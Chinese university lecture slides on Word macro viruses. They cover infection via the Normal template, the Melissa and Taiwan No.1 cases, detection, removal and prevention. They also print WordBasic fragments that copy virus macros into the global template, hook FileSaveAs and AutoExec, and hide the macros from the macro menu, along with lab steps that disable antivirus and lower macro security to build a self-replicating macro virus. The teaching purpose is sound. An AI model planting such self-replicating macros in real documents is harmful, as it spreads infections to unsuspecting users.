宏病毒,上海交通大學(xué)信息安全工程學(xué)院劉功申,本章的學(xué)習(xí)目標(biāo),掌握宏病毒概念掌握宏病毒制作機(jī)制了解宏病毒實(shí)例掌握宏病毒防范方法掌握宏病毒實(shí)驗(yàn),宏病毒定義,宏病毒是利用系統(tǒng)的開放性專門制作的一個(gè)或多個(gè)具有病毒特點(diǎn)的宏的集合，這種病毒宏的集合影響到計(jì)算機(jī)的使用，并能通過文檔及模板進(jìn)行自我復(fù)制及傳播。,支持宏病毒的應(yīng)用系統(tǒng)特點(diǎn),要達(dá)到宏病毒傳染的目的，系統(tǒng)須具備以下特性：可以把特定的宏命令代碼附加在指定文件上；可以實(shí)現(xiàn)宏命令在不同文件之間的共享和傳遞；可以在未經(jīng)使用者許可的情況下獲取某種控制權(quán)。,可支持宏病毒的應(yīng)用系統(tǒng),Microsoft公司的WORD、EXCEL、Access、PowerPoint、Project、Visio等產(chǎn)品；Inprise公司的LotusAmiPro字處理軟件；此外，還包括AutoCAD、CorelDraw、PDF等等。,宏病毒的特點(diǎn),傳播極快制作、變種方便破壞可能性極大多平臺(tái)交叉感染地域性問題,宏病毒的共性,宏病毒會(huì)感染DOC文檔文件和DOT模板文件。打開時(shí)激活，通過Normal模板傳播。通過AutoOpen，AutoClose，AutoNew和AutoExit等自動(dòng)宏獲得控制權(quán)。病毒宏中必然含有對(duì)文檔讀寫操作的宏指令。,宏病毒的作用機(jī)制,模板在建立整個(gè)文檔中所起的作用是作為一個(gè)基類。新文檔繼承模板的屬性（包括宏、菜單、格式等）。編制宏病毒要用到的宏如右表,Word宏病毒感染過程編制語言VBAWordBasic等環(huán)境：VBE,經(jīng)典宏病毒-美麗莎Melissa,利用微軟的Word宏和Outlook發(fā)送載有80個(gè)色情文學(xué)網(wǎng)址的列表它可感染W(wǎng)ord97或Word2000,是一種Word宏病毒當(dāng)用戶打開一個(gè)受到感染的Word97或Word2000文件時(shí)，病毒會(huì)自動(dòng)通過被感染者的Outlook的通訊錄，給前50個(gè)地址發(fā)出帶有W97M_MELISSA病毒的電子郵件。,染毒現(xiàn)象：信箱中將可以看到標(biāo)題為“ImportantmessagefromXX(來自XX的重要信息)”的郵件，其中XX是發(fā)件人的名字。正文中寫道，“這是你索要的文件不要給其他人看;)?！贝送猓撪]件還包括一個(gè)名為list.doc的Word文檔附件，其中包含大量的色情網(wǎng)址。,經(jīng)典宏病毒-臺(tái)灣NO.1B,病毒發(fā)作時(shí)，只要打開一個(gè)Word文檔，就會(huì)被要求計(jì)算一道5個(gè)至多4位數(shù)的連乘算式。由于算式的復(fù)雜度，很難在短時(shí)間內(nèi)計(jì)算出答案，一旦計(jì)算錯(cuò)誤，Word就會(huì)自動(dòng)開啟20個(gè)新窗口，然后再次生成一道類似的算式，接著不斷往復(fù)，直至系統(tǒng)資源耗盡。,經(jīng)典宏病毒-O97M.Tristate.C病毒,O97M.Tristate.C宏病毒可以交叉感染MSWord97、MSExcwel97和MSPowerPoint97等多種程序生成的數(shù)據(jù)文件。病毒從Word文檔、Excel電子表格或PowerPoint幻燈片被激活，并進(jìn)行交叉感染。病毒在Excel中被激活時(shí)，它在ExcelStartup目錄下查找文檔BOOK1.XLS，如果不存在，病毒將在該目錄下創(chuàng)建一個(gè)被感染的工作簿并使Excel的宏病毒保護(hù)功能失效。病毒存放在被感染的電子表格的“ThisWorkbook”中。,宏語言,Office程序和它們所使用的宏語言,使用VBA可以實(shí)現(xiàn)的功能包括：（1）使重復(fù)的任務(wù)自動(dòng)化（2）自定義Word工具欄、菜單和界面（3）簡化模板的使用（4）自定義Word，使其成為開發(fā)平臺(tái),宏病毒關(guān)鍵技術(shù),（1）自動(dòng)執(zhí)行的示例代碼：SubMAINOnErrorGotoAbortiMacroCount=CountMacros(0,0)檢查是否感染該文檔文件Fori=1ToiMacroCountIfMacroName$(i,0,0)="PayLoad"ThenbInstalled=-1,檢查正常的宏EndIfIfMacroName$(i,0,0)="FileSaveAs"ThenbTooMuchTrouble=-1但如果FILESAVEAS宏存在那么傳染比較困難.EndIfNextiIfNotbInstalledAndNotbTooMuchTroubleThen,加入FileSaveAs和拷貝到AutoExecandFileSaveAs.有效代碼不檢查是否感染.把代碼加密使不可讀.iWW6IInstance=Val(GetDocumentVar$("WW6Infector")sMe$=FileName$()Macro$=sMe$+":PayLoad"MacroCopyMacro$,"Global:PayLoad",1Macro$=sMe$+":FileOpen"MacroCopyMacro$,"Global:FileOpen",1Macro$=sMe$+":FileSaveAs"MacroCopyMacro$,"Global:FileSaveAs",1Macro$=sMe$+":AutoExec"MacroCopyMacro$,"Global:AutoExec",1SetProfileString"WW6I",Str$(iWW6IInstance+1)EndIfAbort:EndSub,VBA使用的保護(hù)方法？,（2）SaveAs程序：這是一個(gè)當(dāng)使用FILE/SAVEAS功能時(shí)，拷貝宏病毒到活動(dòng)文本的程序。它使用了許多類似于AutoExec程序的技巧。盡管示例代碼短小，但足以制作一個(gè)小巧的宏病毒。SubMAINDimdlgAsFileSaveAsGetCurValuesdlgDialogdlg,If(Dlg.Format=0)Or(dlg.Format=1)ThenMacroCopy"FileSaveAs",WindowName$()+":FileSaveAs"MacroCopy"FileSave",WindowName$()+":FileSave"MacroCopy"PayLoad",WindowName$()+":PayLoad"MacroCopy"FileOpen",WindowName$()+":FileOpen"Dlg.Format=1EndIfFileDaveAsdlgEndSub,（3）特殊代碼：還有些方法可以用來隱藏和使你的宏病毒更有趣。當(dāng)有些人使用TOOLS/MICRO菜單觀察宏時(shí)，該代碼可以達(dá)到掩飾病毒的目的。SubMAINOnErrorGotoErrorRoutineOldName$=NomFichier$()Ifmacros.bDebugThenMsgBox"startToolsMacro"DimdlgAsOutilsMacroIfmacros.bDebugThenMsgBox"1"GetCurValuesdlgIfmacros.bDebugThenMsgBox"2"OnErrorGotoSkipDialogdlgOutilsMacrodlg,Skip:OnErrorGotoErrorRoutineEndIfREMenableautomacrosDisableAutoMacros0macros.SaveToGlobal(OldName$)macros.objectiveGotoDoneErrorRoutine:OnErrorGotoDoneIfmacros.bDebugThenMsgBox"error"+Str$(Err)+"occurred"EndIfDone:EndSub,Word宏病毒發(fā)現(xiàn)方法,在Normal模板發(fā)現(xiàn)有AutoOpen等自動(dòng)宏，F(xiàn)ileSave等標(biāo)準(zhǔn)宏或一些怪名字的宏，而自己又沒有加載特殊模板，這就有可能有病毒了。當(dāng)打開一個(gè)文檔時(shí)，未經(jīng)任何改動(dòng)，立即就有存盤操作打開以DOC為后綴的文件在另存菜單中只能以模板方式存盤無法使用“另存為（SaveAs）”修改路徑不能再被轉(zhuǎn)存為其它格式的文件DOC文件具備與DOT文檔相一致的內(nèi)部格式(盡管文件擴(kuò)展名未改變)。,手工清除宏病毒的方法,1打開宏菜單，在通用模板中刪除您認(rèn)為是病毒的宏。2打開帶有病毒宏的文檔（模板），然后打開宏菜單，在通用模板和病毒文件名模板中刪除您認(rèn)為是病毒的宏。3保存清潔文檔。,預(yù)防宏病毒,對(duì)于已染毒的模板文件（Normal.dot），應(yīng)先其中的自動(dòng)宏清除（AutoOpen、AutoClose、AutoNew），然后將其置成只讀方式。對(duì)于其他已染毒的文件均應(yīng)將自動(dòng)宏清除，這樣就可以達(dá)到清除病毒的目的。平時(shí)使用時(shí)要加強(qiáng)預(yù)防。對(duì)來歷不明的宏最好刪除。先禁止所有自動(dòng)執(zhí)行的宏。安裝反病毒軟件。,Word宏病毒實(shí)驗(yàn),【實(shí)驗(yàn)?zāi)康摹垦菔竞甑木帉懻f明宏的原理及其安全漏洞和缺陷理解宏病毒的作用機(jī)制【實(shí)驗(yàn)平臺(tái)】Windows系列操作系統(tǒng)Word2003應(yīng)用程序,【實(shí)驗(yàn)步驟】軟件設(shè)置：關(guān)閉殺毒軟件的自動(dòng)防護(hù)功能。打開Word2003，在工具宏安全性中，將安全級(jí)別設(shè)置為低，在可靠發(fā)行商選項(xiàng)卡中，選擇信任任何所有安裝的加載項(xiàng)和模板，選擇信任visualbasic項(xiàng)目的訪問。,實(shí)驗(yàn)八：自我復(fù)制功能演示。打開一個(gè)word文檔，然后按Alt+F11調(diào)用宏編寫窗口（工具宏VisualBasic宏編輯器），在左側(cè)的project>MicrosoftWord對(duì)象ThisDocument中輸入源代碼（參見源代碼一或者從光盤上拷貝，位置為：“光盤盤符:Experimentmacromacro_1.txt”），保存。此時(shí)當(dāng)前word文檔就含有宏病毒，只要下次打開這個(gè)word文檔，就會(huì)執(zhí)行以上代碼，并將自身復(fù)制到Normal.dot（word文檔的公共模板）和當(dāng)前文檔的ThisDocument中，同時(shí)改變函數(shù)名（模板中為Document_Close，當(dāng)前文檔為Document_Open）。此時(shí)所有的word文檔打開和關(guān)閉時(shí)，都將運(yùn)行以上的病毒代碼，可以加入適當(dāng)?shù)膼阂獯a，影響word的正常使用，本例中只是簡單的跳出一個(gè)提示框。,實(shí)驗(yàn)九：類臺(tái)灣1號(hào)病毒實(shí)驗(yàn)對(duì)實(shí)驗(yàn)一的惡意代碼稍加修改，使其具有一定的破壞性（這里以著名宏病毒“臺(tái)灣1號(hào)”的惡意代碼部分為基礎(chǔ)，為使其在word2003版本中運(yùn)行，且降低破壞性，對(duì)源代碼作適當(dāng)修改）。實(shí)驗(yàn)二的源碼參見源代碼二或者從光盤上拷貝，位置為：“光盤盤符:Experimentmacromacro_2.txt”。,該病毒的效果如下：當(dāng)打開被感染的word文檔時(shí)，首先進(jìn)行自我復(fù)制，感染word模板，然后檢查日期，看是否是1日（即在每月的1日會(huì)發(fā)作），然后跳出一個(gè)對(duì)話框，要求用戶進(jìn)行一次心算游戲，這里只用四個(gè)小于10的數(shù)相乘，如果用戶的計(jì)算正確，那么就會(huì)新建一個(gè)文檔，跳出如下字幕：“何謂宏病毒，答案：我就是.；如何預(yù)防宏病毒，答案：不要看我.”。如果計(jì)算錯(cuò)誤，新建20個(gè)寫有“宏病毒”字樣的word文檔，然后再一次進(jìn)行心算游戲，總共進(jìn)行3次，然后跳出程序。關(guān)閉文檔的時(shí)候也會(huì)執(zhí)行同樣的詢問。,清除宏病毒對(duì)每一個(gè)受感染的word文檔進(jìn)行如下操作：打開受感染的word文檔，進(jìn)入宏編輯環(huán)境（Alt+F11），打開NormalMicrosoftWord對(duì)象ThisDocument，清除其中的病毒代碼（只要?jiǎng)h除所有內(nèi)容即可）。然后打開ProjectMicrosoftWordThisDocument，清除其中的病毒代碼。實(shí)際上，模板的病毒代碼只要在處理最后一個(gè)受感染文件時(shí)清除即可，然而清除模板病毒后，如果重新打開其他已感染文件，模板將再次被感染，因此為了保證病毒被清除，可以查看每一個(gè)受感染文檔的模板，如果存在病毒代碼，都進(jìn)行一次清除。,謝謝Q&A,